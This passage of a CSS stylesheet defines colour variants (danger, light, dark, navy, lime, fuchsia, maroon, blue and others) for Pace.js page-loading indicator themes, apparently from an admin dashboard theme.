.pace-center-radar-danger .pace .pace-activity::before {
border-color: #dc3545 transparent transparent;
}
.pace-center-simple-danger .pace {
background: #ffffff;
border-color: #dc3545;
}
.pace-center-simple-danger .pace .pace-progress {
background: #dc3545;
}
.pace-material-danger .pace {
color: #dc3545;
}
.pace-corner-indicator-danger .pace .pace-activity {
background: #dc3545;
}
.pace-corner-indicator-danger .pace .pace-activity::after,
.pace-corner-indicator-danger .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-danger .pace .pace-activity::before {
border-right-color: rgba(220, 53, 69, 0.2);
border-left-color: rgba(220, 53, 69, 0.2);
}
.pace-corner-indicator-danger .pace .pace-activity::after {
border-top-color: rgba(220, 53, 69, 0.2);
border-bottom-color: rgba(220, 53, 69, 0.2);
}
.pace-fill-left-danger .pace .pace-progress {
background-color: rgba(220, 53, 69, 0.2);
}
.pace-flash-danger .pace .pace-progress {
background: #dc3545;
}
.pace-flash-danger .pace .pace-progress-inner {
box-shadow: 0 0 10px #dc3545, 0 0 5px #dc3545;
}
.pace-flash-danger .pace .pace-activity {
border-top-color: #dc3545;
border-left-color: #dc3545;
}
.pace-loading-bar-danger .pace .pace-progress {
background: #dc3545;
color: #dc3545;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-danger .pace .pace-activity {
box-shadow: inset 0 0 0 2px #dc3545, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-danger .pace .pace-progress {
background-color: #dc3545;
box-shadow: inset -1px 0 #dc3545, inset 0 -1px #dc3545, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-danger .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-danger .pace-progress {
color: #dc3545;
}
.pace-light .pace .pace-progress {
background: #f8f9fa;
}
.pace-barber-shop-light .pace {
background: #1F2D3D;
}
.pace-barber-shop-light .pace .pace-progress {
background: #f8f9fa;
}
.pace-barber-shop-light .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-light .pace .pace-progress::after {
color: rgba(248, 249, 250, 0.2);
}
.pace-bounce-light .pace .pace-activity {
background: #f8f9fa;
}
.pace-center-atom-light .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-light .pace-progress::before {
background: #f8f9fa;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-light .pace-activity {
border-color: #f8f9fa;
}
.pace-center-atom-light .pace-activity::after, .pace-center-atom-light .pace-activity::before {
border-color: #f8f9fa;
}
.pace-center-circle-light .pace .pace-progress {
background: rgba(248, 249, 250, 0.8);
color: #1F2D3D;
}
.pace-center-radar-light .pace .pace-activity {
border-color: #f8f9fa transparent transparent;
}
.pace-center-radar-light .pace .pace-activity::before {
border-color: #f8f9fa transparent transparent;
}
.pace-center-simple-light .pace {
background: #1F2D3D;
border-color: #f8f9fa;
}
.pace-center-simple-light .pace .pace-progress {
background: #f8f9fa;
}
.pace-material-light .pace {
color: #f8f9fa;
}
.pace-corner-indicator-light .pace .pace-activity {
background: #f8f9fa;
}
.pace-corner-indicator-light .pace .pace-activity::after,
.pace-corner-indicator-light .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-light .pace .pace-activity::before {
border-right-color: rgba(248, 249, 250, 0.2);
border-left-color: rgba(248, 249, 250, 0.2);
}
.pace-corner-indicator-light .pace .pace-activity::after {
border-top-color: rgba(248, 249, 250, 0.2);
border-bottom-color: rgba(248, 249, 250, 0.2);
}
.pace-fill-left-light .pace .pace-progress {
background-color: rgba(248, 249, 250, 0.2);
}
.pace-flash-light .pace .pace-progress {
background: #f8f9fa;
}
.pace-flash-light .pace .pace-progress-inner {
box-shadow: 0 0 10px #f8f9fa, 0 0 5px #f8f9fa;
}
.pace-flash-light .pace .pace-activity {
border-top-color: #f8f9fa;
border-left-color: #f8f9fa;
}
.pace-loading-bar-light .pace .pace-progress {
background: #f8f9fa;
color: #f8f9fa;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-light .pace .pace-activity {
box-shadow: inset 0 0 0 2px #f8f9fa, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-light .pace .pace-progress {
background-color: #f8f9fa;
box-shadow: inset -1px 0 #f8f9fa, inset 0 -1px #f8f9fa, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-light .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-light .pace-progress {
color: #f8f9fa;
}
.pace-dark .pace .pace-progress {
background: #343a40;
}
.pace-barber-shop-dark .pace {
background: #ffffff;
}
.pace-barber-shop-dark .pace .pace-progress {
background: #343a40;
}
.pace-barber-shop-dark .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-dark .pace .pace-progress::after {
color: rgba(52, 58, 64, 0.2);
}
.pace-bounce-dark .pace .pace-activity {
background: #343a40;
}
.pace-center-atom-dark .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-dark .pace-progress::before {
background: #343a40;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-dark .pace-activity {
border-color: #343a40;
}
.pace-center-atom-dark .pace-activity::after, .pace-center-atom-dark .pace-activity::before {
border-color: #343a40;
}
.pace-center-circle-dark .pace .pace-progress {
background: rgba(52, 58, 64, 0.8);
color: #ffffff;
}
.pace-center-radar-dark .pace .pace-activity {
border-color: #343a40 transparent transparent;
}
.pace-center-radar-dark .pace .pace-activity::before {
border-color: #343a40 transparent transparent;
}
.pace-center-simple-dark .pace {
background: #ffffff;
border-color: #343a40;
}
.pace-center-simple-dark .pace .pace-progress {
background: #343a40;
}
.pace-material-dark .pace {
color: #343a40;
}
.pace-corner-indicator-dark .pace .pace-activity {
background: #343a40;
}
.pace-corner-indicator-dark .pace .pace-activity::after,
.pace-corner-indicator-dark .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-dark .pace .pace-activity::before {
border-right-color: rgba(52, 58, 64, 0.2);
border-left-color: rgba(52, 58, 64, 0.2);
}
.pace-corner-indicator-dark .pace .pace-activity::after {
border-top-color: rgba(52, 58, 64, 0.2);
border-bottom-color: rgba(52, 58, 64, 0.2);
}
.pace-fill-left-dark .pace .pace-progress {
background-color: rgba(52, 58, 64, 0.2);
}
.pace-flash-dark .pace .pace-progress {
background: #343a40;
}
.pace-flash-dark .pace .pace-progress-inner {
box-shadow: 0 0 10px #343a40, 0 0 5px #343a40;
}
.pace-flash-dark .pace .pace-activity {
border-top-color: #343a40;
border-left-color: #343a40;
}
.pace-loading-bar-dark .pace .pace-progress {
background: #343a40;
color: #343a40;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-dark .pace .pace-activity {
box-shadow: inset 0 0 0 2px #343a40, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-dark .pace .pace-progress {
background-color: #343a40;
box-shadow: inset -1px 0 #343a40, inset 0 -1px #343a40, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-dark .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-dark .pace-progress {
color: #343a40;
}
.pace-lightblue .pace .pace-progress {
background: #3c8dbc;
}
.pace-barber-shop-lightblue .pace {
background: #ffffff;
}
.pace-barber-shop-lightblue .pace .pace-progress {
background: #3c8dbc;
}
.pace-barber-shop-lightblue .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-lightblue .pace .pace-progress::after {
color: rgba(60, 141, 188, 0.2);
}
.pace-bounce-lightblue .pace .pace-activity {
background: #3c8dbc;
}
.pace-center-atom-lightblue .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-lightblue .pace-progress::before {
background: #3c8dbc;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-lightblue .pace-activity {
border-color: #3c8dbc;
}
.pace-center-atom-lightblue .pace-activity::after, .pace-center-atom-lightblue .pace-activity::before {
border-color: #3c8dbc;
}
.pace-center-circle-lightblue .pace .pace-progress {
background: rgba(60, 141, 188, 0.8);
color: #ffffff;
}
.pace-center-radar-lightblue .pace .pace-activity {
border-color: #3c8dbc transparent transparent;
}
.pace-center-radar-lightblue .pace .pace-activity::before {
border-color: #3c8dbc transparent transparent;
}
.pace-center-simple-lightblue .pace {
background: #ffffff;
border-color: #3c8dbc;
}
.pace-center-simple-lightblue .pace .pace-progress {
background: #3c8dbc;
}
.pace-material-lightblue .pace {
color: #3c8dbc;
}
.pace-corner-indicator-lightblue .pace .pace-activity {
background: #3c8dbc;
}
.pace-corner-indicator-lightblue .pace .pace-activity::after,
.pace-corner-indicator-lightblue .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-lightblue .pace .pace-activity::before {
border-right-color: rgba(60, 141, 188, 0.2);
border-left-color: rgba(60, 141, 188, 0.2);
}
.pace-corner-indicator-lightblue .pace .pace-activity::after {
border-top-color: rgba(60, 141, 188, 0.2);
border-bottom-color: rgba(60, 141, 188, 0.2);
}
.pace-fill-left-lightblue .pace .pace-progress {
background-color: rgba(60, 141, 188, 0.2);
}
.pace-flash-lightblue .pace .pace-progress {
background: #3c8dbc;
}
.pace-flash-lightblue .pace .pace-progress-inner {
box-shadow: 0 0 10px #3c8dbc, 0 0 5px #3c8dbc;
}
.pace-flash-lightblue .pace .pace-activity {
border-top-color: #3c8dbc;
border-left-color: #3c8dbc;
}
.pace-loading-bar-lightblue .pace .pace-progress {
background: #3c8dbc;
color: #3c8dbc;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-lightblue .pace .pace-activity {
box-shadow: inset 0 0 0 2px #3c8dbc, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-lightblue .pace .pace-progress {
background-color: #3c8dbc;
box-shadow: inset -1px 0 #3c8dbc, inset 0 -1px #3c8dbc, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-lightblue .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-lightblue .pace-progress {
color: #3c8dbc;
}
.pace-navy .pace .pace-progress {
background: #001f3f;
}
.pace-barber-shop-navy .pace {
background: #ffffff;
}
.pace-barber-shop-navy .pace .pace-progress {
background: #001f3f;
}
.pace-barber-shop-navy .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-navy .pace .pace-progress::after {
color: rgba(0, 31, 63, 0.2);
}
.pace-bounce-navy .pace .pace-activity {
background: #001f3f;
}
.pace-center-atom-navy .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-navy .pace-progress::before {
background: #001f3f;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-navy .pace-activity {
border-color: #001f3f;
}
.pace-center-atom-navy .pace-activity::after, .pace-center-atom-navy .pace-activity::before {
border-color: #001f3f;
}
.pace-center-circle-navy .pace .pace-progress {
background: rgba(0, 31, 63, 0.8);
color: #ffffff;
}
.pace-center-radar-navy .pace .pace-activity {
border-color: #001f3f transparent transparent;
}
.pace-center-radar-navy .pace .pace-activity::before {
border-color: #001f3f transparent transparent;
}
.pace-center-simple-navy .pace {
background: #ffffff;
border-color: #001f3f;
}
.pace-center-simple-navy .pace .pace-progress {
background: #001f3f;
}
.pace-material-navy .pace {
color: #001f3f;
}
.pace-corner-indicator-navy .pace .pace-activity {
background: #001f3f;
}
.pace-corner-indicator-navy .pace .pace-activity::after,
.pace-corner-indicator-navy .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-navy .pace .pace-activity::before {
border-right-color: rgba(0, 31, 63, 0.2);
border-left-color: rgba(0, 31, 63, 0.2);
}
.pace-corner-indicator-navy .pace .pace-activity::after {
border-top-color: rgba(0, 31, 63, 0.2);
border-bottom-color: rgba(0, 31, 63, 0.2);
}
.pace-fill-left-navy .pace .pace-progress {
background-color: rgba(0, 31, 63, 0.2);
}
.pace-flash-navy .pace .pace-progress {
background: #001f3f;
}
.pace-flash-navy .pace .pace-progress-inner {
box-shadow: 0 0 10px #001f3f, 0 0 5px #001f3f;
}
.pace-flash-navy .pace .pace-activity {
border-top-color: #001f3f;
border-left-color: #001f3f;
}
.pace-loading-bar-navy .pace .pace-progress {
background: #001f3f;
color: #001f3f;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-navy .pace .pace-activity {
box-shadow: inset 0 0 0 2px #001f3f, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-navy .pace .pace-progress {
background-color: #001f3f;
box-shadow: inset -1px 0 #001f3f, inset 0 -1px #001f3f, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-navy .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-navy .pace-progress {
color: #001f3f;
}
.pace-olive .pace .pace-progress {
background: #3d9970;
}
.pace-barber-shop-olive .pace {
background: #ffffff;
}
.pace-barber-shop-olive .pace .pace-progress {
background: #3d9970;
}
.pace-barber-shop-olive .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-olive .pace .pace-progress::after {
color: rgba(61, 153, 112, 0.2);
}
.pace-bounce-olive .pace .pace-activity {
background: #3d9970;
}
.pace-center-atom-olive .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-olive .pace-progress::before {
background: #3d9970;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-olive .pace-activity {
border-color: #3d9970;
}
.pace-center-atom-olive .pace-activity::after, .pace-center-atom-olive .pace-activity::before {
border-color: #3d9970;
}
.pace-center-circle-olive .pace .pace-progress {
background: rgba(61, 153, 112, 0.8);
color: #ffffff;
}
.pace-center-radar-olive .pace .pace-activity {
border-color: #3d9970 transparent transparent;
}
.pace-center-radar-olive .pace .pace-activity::before {
border-color: #3d9970 transparent transparent;
}
.pace-center-simple-olive .pace {
background: #ffffff;
border-color: #3d9970;
}
.pace-center-simple-olive .pace .pace-progress {
background: #3d9970;
}
.pace-material-olive .pace {
color: #3d9970;
}
.pace-corner-indicator-olive .pace .pace-activity {
background: #3d9970;
}
.pace-corner-indicator-olive .pace .pace-activity::after,
.pace-corner-indicator-olive .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-olive .pace .pace-activity::before {
border-right-color: rgba(61, 153, 112, 0.2);
border-left-color: rgba(61, 153, 112, 0.2);
}
.pace-corner-indicator-olive .pace .pace-activity::after {
border-top-color: rgba(61, 153, 112, 0.2);
border-bottom-color: rgba(61, 153, 112, 0.2);
}
.pace-fill-left-olive .pace .pace-progress {
background-color: rgba(61, 153, 112, 0.2);
}
.pace-flash-olive .pace .pace-progress {
background: #3d9970;
}
.pace-flash-olive .pace .pace-progress-inner {
box-shadow: 0 0 10px #3d9970, 0 0 5px #3d9970;
}
.pace-flash-olive .pace .pace-activity {
border-top-color: #3d9970;
border-left-color: #3d9970;
}
.pace-loading-bar-olive .pace .pace-progress {
background: #3d9970;
color: #3d9970;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-olive .pace .pace-activity {
box-shadow: inset 0 0 0 2px #3d9970, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-olive .pace .pace-progress {
background-color: #3d9970;
box-shadow: inset -1px 0 #3d9970, inset 0 -1px #3d9970, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-olive .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-olive .pace-progress {
color: #3d9970;
}
.pace-lime .pace .pace-progress {
background: #01ff70;
}
.pace-barber-shop-lime .pace {
background: #1F2D3D;
}
.pace-barber-shop-lime .pace .pace-progress {
background: #01ff70;
}
.pace-barber-shop-lime .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-lime .pace .pace-progress::after {
color: rgba(1, 255, 112, 0.2);
}
.pace-bounce-lime .pace .pace-activity {
background: #01ff70;
}
.pace-center-atom-lime .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-lime .pace-progress::before {
background: #01ff70;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-lime .pace-activity {
border-color: #01ff70;
}
.pace-center-atom-lime .pace-activity::after, .pace-center-atom-lime .pace-activity::before {
border-color: #01ff70;
}
.pace-center-circle-lime .pace .pace-progress {
background: rgba(1, 255, 112, 0.8);
color: #1F2D3D;
}
.pace-center-radar-lime .pace .pace-activity {
border-color: #01ff70 transparent transparent;
}
.pace-center-radar-lime .pace .pace-activity::before {
border-color: #01ff70 transparent transparent;
}
.pace-center-simple-lime .pace {
background: #1F2D3D;
border-color: #01ff70;
}
.pace-center-simple-lime .pace .pace-progress {
background: #01ff70;
}
.pace-material-lime .pace {
color: #01ff70;
}
.pace-corner-indicator-lime .pace .pace-activity {
background: #01ff70;
}
.pace-corner-indicator-lime .pace .pace-activity::after,
.pace-corner-indicator-lime .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-lime .pace .pace-activity::before {
border-right-color: rgba(1, 255, 112, 0.2);
border-left-color: rgba(1, 255, 112, 0.2);
}
.pace-corner-indicator-lime .pace .pace-activity::after {
border-top-color: rgba(1, 255, 112, 0.2);
border-bottom-color: rgba(1, 255, 112, 0.2);
}
.pace-fill-left-lime .pace .pace-progress {
background-color: rgba(1, 255, 112, 0.2);
}
.pace-flash-lime .pace .pace-progress {
background: #01ff70;
}
.pace-flash-lime .pace .pace-progress-inner {
box-shadow: 0 0 10px #01ff70, 0 0 5px #01ff70;
}
.pace-flash-lime .pace .pace-activity {
border-top-color: #01ff70;
border-left-color: #01ff70;
}
.pace-loading-bar-lime .pace .pace-progress {
background: #01ff70;
color: #01ff70;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-lime .pace .pace-activity {
box-shadow: inset 0 0 0 2px #01ff70, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-lime .pace .pace-progress {
background-color: #01ff70;
box-shadow: inset -1px 0 #01ff70, inset 0 -1px #01ff70, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-lime .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-lime .pace-progress {
color: #01ff70;
}
.pace-fuchsia .pace .pace-progress {
background: #f012be;
}
.pace-barber-shop-fuchsia .pace {
background: #ffffff;
}
.pace-barber-shop-fuchsia .pace .pace-progress {
background: #f012be;
}
.pace-barber-shop-fuchsia .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-fuchsia .pace .pace-progress::after {
color: rgba(240, 18, 190, 0.2);
}
.pace-bounce-fuchsia .pace .pace-activity {
background: #f012be;
}
.pace-center-atom-fuchsia .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-fuchsia .pace-progress::before {
background: #f012be;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-fuchsia .pace-activity {
border-color: #f012be;
}
.pace-center-atom-fuchsia .pace-activity::after, .pace-center-atom-fuchsia .pace-activity::before {
border-color: #f012be;
}
.pace-center-circle-fuchsia .pace .pace-progress {
background: rgba(240, 18, 190, 0.8);
color: #ffffff;
}
.pace-center-radar-fuchsia .pace .pace-activity {
border-color: #f012be transparent transparent;
}
.pace-center-radar-fuchsia .pace .pace-activity::before {
border-color: #f012be transparent transparent;
}
.pace-center-simple-fuchsia .pace {
background: #ffffff;
border-color: #f012be;
}
.pace-center-simple-fuchsia .pace .pace-progress {
background: #f012be;
}
.pace-material-fuchsia .pace {
color: #f012be;
}
.pace-corner-indicator-fuchsia .pace .pace-activity {
background: #f012be;
}
.pace-corner-indicator-fuchsia .pace .pace-activity::after,
.pace-corner-indicator-fuchsia .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-fuchsia .pace .pace-activity::before {
border-right-color: rgba(240, 18, 190, 0.2);
border-left-color: rgba(240, 18, 190, 0.2);
}
.pace-corner-indicator-fuchsia .pace .pace-activity::after {
border-top-color: rgba(240, 18, 190, 0.2);
border-bottom-color: rgba(240, 18, 190, 0.2);
}
.pace-fill-left-fuchsia .pace .pace-progress {
background-color: rgba(240, 18, 190, 0.2);
}
.pace-flash-fuchsia .pace .pace-progress {
background: #f012be;
}
.pace-flash-fuchsia .pace .pace-progress-inner {
box-shadow: 0 0 10px #f012be, 0 0 5px #f012be;
}
.pace-flash-fuchsia .pace .pace-activity {
border-top-color: #f012be;
border-left-color: #f012be;
}
.pace-loading-bar-fuchsia .pace .pace-progress {
background: #f012be;
color: #f012be;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-fuchsia .pace .pace-activity {
box-shadow: inset 0 0 0 2px #f012be, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-fuchsia .pace .pace-progress {
background-color: #f012be;
box-shadow: inset -1px 0 #f012be, inset 0 -1px #f012be, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-fuchsia .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-fuchsia .pace-progress {
color: #f012be;
}
.pace-maroon .pace .pace-progress {
background: #d81b60;
}
.pace-barber-shop-maroon .pace {
background: #ffffff;
}
.pace-barber-shop-maroon .pace .pace-progress {
background: #d81b60;
}
.pace-barber-shop-maroon .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-maroon .pace .pace-progress::after {
color: rgba(216, 27, 96, 0.2);
}
.pace-bounce-maroon .pace .pace-activity {
background: #d81b60;
}
.pace-center-atom-maroon .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-maroon .pace-progress::before {
background: #d81b60;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-maroon .pace-activity {
border-color: #d81b60;
}
.pace-center-atom-maroon .pace-activity::after, .pace-center-atom-maroon .pace-activity::before {
border-color: #d81b60;
}
.pace-center-circle-maroon .pace .pace-progress {
background: rgba(216, 27, 96, 0.8);
color: #ffffff;
}
.pace-center-radar-maroon .pace .pace-activity {
border-color: #d81b60 transparent transparent;
}
.pace-center-radar-maroon .pace .pace-activity::before {
border-color: #d81b60 transparent transparent;
}
.pace-center-simple-maroon .pace {
background: #ffffff;
border-color: #d81b60;
}
.pace-center-simple-maroon .pace .pace-progress {
background: #d81b60;
}
.pace-material-maroon .pace {
color: #d81b60;
}
.pace-corner-indicator-maroon .pace .pace-activity {
background: #d81b60;
}
.pace-corner-indicator-maroon .pace .pace-activity::after,
.pace-corner-indicator-maroon .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-maroon .pace .pace-activity::before {
border-right-color: rgba(216, 27, 96, 0.2);
border-left-color: rgba(216, 27, 96, 0.2);
}
.pace-corner-indicator-maroon .pace .pace-activity::after {
border-top-color: rgba(216, 27, 96, 0.2);
border-bottom-color: rgba(216, 27, 96, 0.2);
}
.pace-fill-left-maroon .pace .pace-progress {
background-color: rgba(216, 27, 96, 0.2);
}
.pace-flash-maroon .pace .pace-progress {
background: #d81b60;
}
.pace-flash-maroon .pace .pace-progress-inner {
box-shadow: 0 0 10px #d81b60, 0 0 5px #d81b60;
}
.pace-flash-maroon .pace .pace-activity {
border-top-color: #d81b60;
border-left-color: #d81b60;
}
.pace-loading-bar-maroon .pace .pace-progress {
background: #d81b60;
color: #d81b60;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-maroon .pace .pace-activity {
box-shadow: inset 0 0 0 2px #d81b60, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-maroon .pace .pace-progress {
background-color: #d81b60;
box-shadow: inset -1px 0 #d81b60, inset 0 -1px #d81b60, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-maroon .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-maroon .pace-progress {
color: #d81b60;
}
.pace-blue .pace .pace-progress {
background: #007bff;
}
.pace-barber-shop-blue .pace {
background: #ffffff;
}
.pace-barber-shop-blue .pace .pace-progress {
background: #007bff;
}
.pace-barber-shop-blue .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-blue .pace .pace-progress::after {
color: rgba(0, 123, 255, 0.2);
}
.pace-bounce-blue .pace .pace-activity {
background: #007bff;
}
.pace-center-atom-blue .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-blue .pace-progress::before {
background: #007bff;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-blue .pace-activity {
border-color: #007bff;
}
.pace-center-atom-blue .pace-activity::after, .pace-center-atom-blue .pace-activity::before {
border-color: #007bff;
}
.pace-center-circle-blue .pace .pace-progress {
background: rgba(0, 123, 255, 0.8);
color: #ffffff;
}
.pace-center-radar-blue .pace .pace-activity {
border-color: #007bff transparent transparent;
}
.pace-center-radar-blue .pace .pace-activity::before {
border-color: #007bff transparent transparent;
}
.pace-center-simple-blue .pace {
background: #ffffff;
border-color: #007bff;
}
.pace-center-simple-blue .pace .pace-progress {
background: #007bff;
}
.pace-material-blue .pace {
color: #007bff;
}
.pace-corner-indicator-blue .pace .pace-activity {
background: #007bff;
}
.pace-corner-indicator-blue .pace .pace-activity::after,
.pace-corner-indicator-blue .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-blue .pace .pace-activity::before {
border-right-color: rgba(0, 123, 255, 0.2);
border-left-color: rgba(0, 123, 255, 0.2);
}
.pace-corner-indicator-blue .pace .pace-activity::after {
border-top-color: rgba(0, 123, 255, 0.2);
border-bottom-color: rgba(0, 123, 255, 0.2);
}
.pace-fill-left-blue .pace .pace-progress {
background-color: rgba(0, 123, 255, 0.2);
}
.pace-flash-blue .pace .pace-progress {
background: #007bff;
}
.pace-flash-blue .pace .pace-progress-inner {
box-shadow: 0 0 10px #007bff, 0 0 5px #007bff;
}
.pace-flash-blue .pace .pace-activity {
border-top-color: #007bff;
border-left-color: #007bff;
}
.pace-loading-bar-blue .pace .pace-progress {
background: #007bff;
color: #007bff;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-blue .pace .pace-activity {
box-shadow: inset 0 0 0 2px #007bff, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-blue .pace .pace-progress {
background-color: #007bff;
box-shadow: inset -1px 0 #007bff, inset 0 -1px #007bff, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-blue .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-blue .pace-progress {
color: #007bff;
}
